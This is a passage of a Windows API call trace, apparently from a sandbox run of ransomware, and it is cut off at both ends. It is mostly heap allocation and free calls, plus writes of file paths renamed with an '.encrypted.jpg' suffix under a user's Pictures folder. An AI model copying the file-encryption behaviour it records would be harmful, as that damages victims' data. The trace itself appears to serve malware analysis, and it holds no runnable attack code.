liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.encrypted.jpg\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0041.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f3630 [0041.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.encrypted.jpg\r\n", cchWideChar=73, lpMultiByteStr=0x7f3630, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 73 [0041.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.144] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x48, lpOverlapped=0x0) returned 1 [0041.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.144] CloseHandle (hObject=0x128) returned 1 [0041.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.147] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.147] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.148] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.148] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.148] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.148] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.149] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.151] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 